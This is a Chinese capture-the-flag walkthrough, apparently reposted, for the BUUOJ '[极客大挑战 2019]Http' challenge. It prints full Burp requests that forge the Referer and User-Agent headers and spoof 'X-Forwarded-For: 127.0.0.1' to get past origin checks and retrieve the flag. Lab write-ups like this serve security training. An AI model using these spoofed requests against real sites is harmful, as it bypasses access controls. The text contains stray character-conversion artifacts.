打開環(huán)境，查看源碼
找到了secret.php

訪問之后說：必須從這個(gè)https://www.Sycsecret.com點(diǎn)過來的才有效
開burp抓包吧，丟到repeater里面，添加referer頭，referer頭就是證明你從哪里點(diǎn)進(jìn)來的。

GET /Secret.php HTTP/1.1 Host: node3.buuoj.cn:29856
referer:https://www.Sycsecret.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

GO

又告訴你必須要使用Syclover這個(gè)瀏覽器，那就改唄

GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:29856
referer:https://www.Sycsecret.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Syclover
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Go
又說必須本地打開才行
怎么樣才能本地打開呢？
這里就要用到X-Forwarded-For這個(gè)擴(kuò)展頭

X-Forwarded-For 是一個(gè) HTTP 擴(kuò)展頭部。HTTP/1.1（RFC 2616）協(xié)議并沒有對它的定義，它最開始是由Squid 這個(gè)緩存代理軟件引入，用來表示 HTTP 請求端真實(shí) IP。如今它已經(jīng)成為事實(shí)上的標(biāo)準(zhǔn)，被各大 HTTP代理、負(fù)載均衡等轉(zhuǎn)發(fā)服務(wù)廣泛使用，并被寫入 RFC 7239（Forwarded HTTP Extension）標(biāo)準(zhǔn)之中。

設(shè)置X-Forwarded-For:127.0.0.1
或者X-Forwarded-For:localhost

GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:29856
referer:https://www.Sycsecret.com
X-Forwarded-For:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0)
Gecko/20100101 Syclover
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

得到flag

總結(jié)

以上是生活随笔為你收集整理的[极客大挑战 2019]Http 1（修改HTTP请求包）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。